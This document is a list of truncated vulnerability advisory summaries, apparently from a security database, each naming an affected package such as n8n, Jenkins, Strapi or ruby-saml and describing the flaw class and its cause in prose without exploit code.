Improper TLS Hostname Verification

org.apache.logging.log4j, log4j-core is vulnerable to improper TLS hostname verification. The vulnerability is due to the Socket Appender not enforcing TLS hostname verification even when explicitly enabled, which allows a man-in-the-middle attacker to intercept or redirect log traffic by...

Insecure Deserialization

Apache NiFi is vulnerable to Insecure Deserialization. The vulnerability is due to where the GetAsanaObject Processor stores and retrieves state data using generic Java object deserialization without validation, allowing attackers with direct access to the configured Distributed Map Cache server ...

Authentication Bypass

Signal K Server is vulnerable to Authentication Bypass. The vulnerability is due to unauthenticated exposure of WebSocket server events and access-request status endpoints, which allows an attacker to enumerate request IDs and poll their status to steal plaintext JWT tokens and fully hijack...

Path Traversal

AdonisJS is vulnerable to Path Traversal. The vulnerability is due to improper validation of file paths during multipart file handling, which allows a remote attacker to write arbitrary files to arbitrary locations on the server filesystem...

Remote Code Execution (RCE)

n8n is vulnerable to Remote Code Execution RCE. The vulnerability is due to insufficient isolation in the Pyodide-based Python Code Node, which allows an authenticated attacker with workflow modification privileges to escape the sandbox and execute arbitrary commands on the host system running n8...

Prototype Pollution

apidoc-core is vulnerable to Prototype Pollution. The vulnerability is due to improper handling of malformed data structures in the preProcess functions, which allows an attacker to manipulate JavaScript object prototypes via crafted properties such as define, leading to denial of service or...

Improper Input Validation

qs is vulnerable to Improper Input Validation. The vulnerability is due to the arrayLimit option not being enforced for bracket notation parameters during query parsing, which allows an attacker to supply a large number of array elements and cause memory exhaustion via crafted HTTP requests...

Command Injection

Serverless Framework is vulnerable to Command Injection. The vulnerability is due to unsanitized user input being passed to childprocess.exec in the experimental MCP server feature, which allows an attacker to inject shell metacharacters and execute arbitrary system commands with the privileges o...

Open Redirect

Koa is vulnerable to Open Redirect. The vulnerability is due to improper validation of the Referer header in the back redirect functionality, which allows an attacker to craft specially formed URLs treated as safe relative paths and force a user’s browser to redirect to an external, potentially...

User Enumeration

ibexa/user is vulnerable to User Enumeration. The vulnerability is due to overly descriptive error messages, which allows an attacker to determine whether a user account exists by observing differences in error responses...

Sensitive Information Exposure

@actual-app/sync-server is vulnerable to sensitive Information Exposure. The vulnerability is due to logging parsed API responses to STDOUT using console.log/console.debug, which allows an attacker with access to application logs to obtain sensitive data such as bearer tokens, bank account detail...

Cross-site Scripting (XSS)

ibexa/admin-ui is vulnerable to cross-site scripting XSS. The vulnerability is due to improper escaping of user-controlled input in image asset names, content language names, and future publishing within the back office, which allows an attacker with editor or administrator-level permissions to...

Arbitrary File Write

github.com/git-lfs/git-lfs is vulnerable to arbitrary file write. The vulnerability is due to Git LFS not validating symbolic or hard links before writing files during git lfs checkout or git lfs pull, which allows an attacker to craft a malicious repository that causes Git LFS to write to...

Remote Code Execution (RCE)

n8n is vulnerable to Remote Code Execution RCE. The vulnerability is due to insufficient isolation in the workflow expression evaluation system, which allows an authenticated attacker to supply crafted expressions that are executed in the runtime context, enabling arbitrary code execution with th...

Cross-Site Scripting (XSS)

ezsystems/ezplatform-admin-ui is vulnerable to Cross-Site Scripting XSS. The vulnerability is due to improper escaping of user-controlled input in image asset names, content language names, and future publishing features, which allows an attacker with back-office editor or administrator privilege...

Server-Side Request Forgery (SSRF)

@lobehub/chat is vulnerable to Server-Side Request Forgery SSRF. The vulnerability is due to insufficient validation and restriction of user-supplied URLs in the tools.search.crawlPages tRPC endpoint, which allows an attacker with a valid token to supply arbitrary URLs and force the server to mak...

Improper Authentication

github.com/mattermost/mattermost-server is vulnerable to improper authentication. The vulnerability is due to failure to validate email ownership during the Slack import process, which allows an attacker to create verified user accounts with arbitrary email domains and bypass email-based team...

Improper Access Control

@strapi/core is vulnerable to improper access control. The vulnerability is due to improper sanitization of query parameters in the document service lookup operator, which allows an attacker to craft malicious queries to access private fields such as admin passwords and reset tokens...

Deserialization Of Untrusted Data

Apache Causeway is vulnerable to Deserialization Of Untrusted Data. The vulnerability is due to unsafe Java deserialization of user-controllable URL parameters in ViewModel handling, which allows an authenticated attacker to execute arbitrary code with application privileges...

Prototype Pollution

js-yaml is vulnerable to Prototype Pollution. The vulnerability is due to improper handling of special object properties such as proto during YAML parsing, which allows an attacker to modify object prototypes and manipulate application behavior when untrusted YAML input is processed...

Cross-site Scripting (XSS)

OWASP Java HTML Sanitizer is vulnerable to Cross-site Scripting XSS. The vulnerability is due to improper sanitization when HtmlPolicyBuilder permits noscript and style tags with allowTextIn, which allows an attacker to craft malicious CSS or HTML payloads that bypass the defined policy and execu...

Cross-site Request Forgery (CSRF)

Jenkins is vulnerable to Cross-site Request Forgery CSRF. The vulnerability is due to missing or insufficient CSRF protection on login-related functionality, which allows an attacker to trick a victim into unknowingly authenticating into the attacker’s account...

Improper Authentication

github.com/edgelesssys/contrast is vulnerable to Improper Authentication. The vulnerability is due to unauthenticated LUKS2 volume metadata and support for null key-encryption algorithms, which allows an attacker to craft a malicious volume that opens with any passphrase and captures all written...

Sensitive Information Disclosure

Jenkins is vulnerable to Sensitive Information Disclosure. The vulnerability is due to build authorization tokens not being masked in the job configuration form, which allows an attacker who can view the configuration page to observe and capture these tokens...

Sensitive Information Disclosure

Jenkins is vulnerable to Sensitive Information Disclosure. The vulnerability is due to build authorization tokens being stored unencrypted in job configuration files, which allows an attacker with extended read permissions or file system access to view and misuse these credentials...

Missing Authorization

Jenkins is vulnerable to Missing Authorization. The vulnerability is due to a missing permission check on viewing encrypted credential data, which allows attackers with only View/Read permissions to access and view encrypted password values in views...

Improper Access Control

github.com/bishopfox/sliver is vulnerable to Improper Access Control. The vulnerability is due to the custom WireGuard netstack not restricting traffic between connected clients, which allows an attacker with leaked or recovered keypairs to communicate with other implants, access exposed port...

Server-side Request Forgery (SSRF)

Astro is vulnerable to server-side request forgery SSRF. The vulnerability is due to improper image proxy domain validation, which allows an attacker to bypass restrictions using backslashes in the href parameter and trigger server-side requests to arbitrary URLs...

Authentication Bypass

Node-SAML is vulnerable to an Authentication Bypass. The vulnerability is due to loading assertions from the unsigned original SAML response instead of the signature-verified data, allowing attackers to modify authentication details within a valid assertion, such as altering the username, and...

Race Condition

com.okta.sdk, okta-sdk-api is vulnerable to a Race Condition. The vulnerability is due to concurrent use of the ApiClient class, where shared request state can cause response headers or status codes from one request to affect another, potentially leading to incorrect or unsafe API responses...

Improper Path Handling

formio is vulnerable to improper path handling. The vulnerability is due to improper validation of crafted request paths, which allows an unauthenticated or unauthorized attacker to bypass API access controls and retrieve data from protected endpoints...

Improper Authorization

github.com/mattermost/mattermost-server is vulnerable to Improper Authorization. The vulnerability is due to failure to verify whether a user has permission to join a Mattermost team when processing the original invite token, which allows an attacker to manipulate the RelayState parameter and joi...

Regular Expression Denial Of Service (ReDoS)

Apache Traffic Control is vulnerable to Regular Expression Denial of Service ReDoS. The vulnerability is due to inefficiently handled regular expression patterns in the Traffic Router management interface, which allows an attacker with management access to supply malicious patterns and cause deni...

Improper Neutralization Of Special Elements

ESAPI esapi-java-legacy is vulnerable to an Improper Neutralization of Special Elements. The vulnerability is due to insufficient sanitization in the Encoder.encodeForSQL interface, where the SQL encoding logic fails to properly neutralize special characters, resulting in incomplete protection an...

Weak Password Hash Generation

xxl-job is vulnerable to a Weak Password Hash Generation vulnerability. The vulnerability is due to insufficient computational effort in the 'makeToken' function of 'IndexController.java', where an attacker can manipulate the token-generation logic to obtain and resulting remote compromise...

Regular Expression Denial Of Service (ReDoS)

Yarn is vulnerable to Regular Expression Denial Of Service ReDoS. The vulnerability is due to improper handling of user-controlled options in the setOptions function, which allows a local attacker to supply crafted input that triggers excessive regular expression processing and causes a denial of...

Unvalidated Redirect

NocoDB is vulnerable to an unvalidated redirect. The vulnerability is due to missing validation of the user-controlled continueAfterSignIn parameter in the login flow, which allows an attacker to redirect authenticated users to arbitrary external websites after login...

Improper Input Validation

sha.js is vulnerable to Improper Input Validation. The vulnerability is due to insufficient validation of input data, which allows an attacker to manipulate crafted inputs to influence how data is processed...

Improper Input Validation

cipher-base is vulnerable to Improper Input Validation. The vulnerability is due to insufficient validation of input data, which allows an attacker to manipulate crafted inputs to alter processing behavior...

Improper Password Length Validation

@strapi/core is vulnerable to improper password length validation. The vulnerability is due to the lack of enforcing a maximum password length when using bcryptjs, which truncates passwords beyond 72 bytes, allowing an attacker to authenticate using only the first 72 bytes of an overlong password...

Prototype Pollution

Vuetify is vulnerable to Prototype Pollution. The vulnerability is due to the internal mergeDeep utility merging user-supplied preset objects without proper safeguards, which allows an attacker to supply a crafted preset to pollute JavaScript object prototypes and potentially cause denial of...

Cross-Origin Resource Sharing (CORS) Misconfiguration

@strapi/core is vulnerable to Cross-Origin Resource Sharing CORS Misconfiguration. The vulnerability is due to improper validation of the Origin header in default configurations, which allows an attacker to exploit this by hosting a malicious site on a different origin and sending credentialed...

Cross-site Scripting (XSS)

Vuetify is vulnerable to Cross-site Scripting XSS. The vulnerability is due to unsanitized HTML being assigned to the innerHTML of the VDatePicker title via the title-date-format property, which allows an attacker to inject and execute arbitrary JavaScript in the victim’s browser...

Arbitrary Command Injection

mcp-server-kubernetes is vulnerable to Arbitrary Command Injection. The vulnerability is due to passing user-supplied command strings directly to shell execution sh -c without input validation, which allows an attacker to inject and execute arbitrary commands through crafted inputs or indirect...

Denial Of Service (DoS)

react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack and next are vulnerable to a Denial-Of-Service DoS. The vulnerability is due to insufficient patching of unsafe payload deserialization in React Server Components, where maliciously crafted HTTP requests sent to Server...

Authentication Bypass

ruby-saml is vulnerable to authentication bypass. The vulnerability is due to improper handling of libxml2 canonicalization in Nokogiri when processing invalid XML, which returns an empty string used for DigestValue calculation, allowing an attacker to perform a Signature Wrapping attack and bypa...

Remote Code Execution (RCE)

Fugue is vulnerable to Remote Code Execution RCE. The vulnerability is due to unsafe deserialization in the FlaskRPCServer implementation, where the decode function uses cloudpickle.loads on untrusted data, allowing attackers to send malicious serialized objects that execute arbitrary code on the...

Authentication Bypass

keylime is vulnerable to Authentication Bypass. The vulnerability is due to insufficient validation during agent registration, where a malicious actor can register a new agent with a different TPM while reusing an existing agent’s UUID, allowing the attacker to overwrite the legitimate agent...

Improper Access Control

mad-proxy is vulnerable to Improper Access Control. The vulnerability is due to flaws in HTTP/HTTPS traffic interception logic, allowing attackers to bypass security policies and evade traffic inspection, potentially exposing sensitive data...

Authentication Bypass

ruby-saml is vulnerable to authentication bypass. The vulnerability is due to inconsistent XML parsing between REXML and Nokogiri resulting in different document structures, which allows an attacker to perform a Signature Wrapping attack and bypass authentication...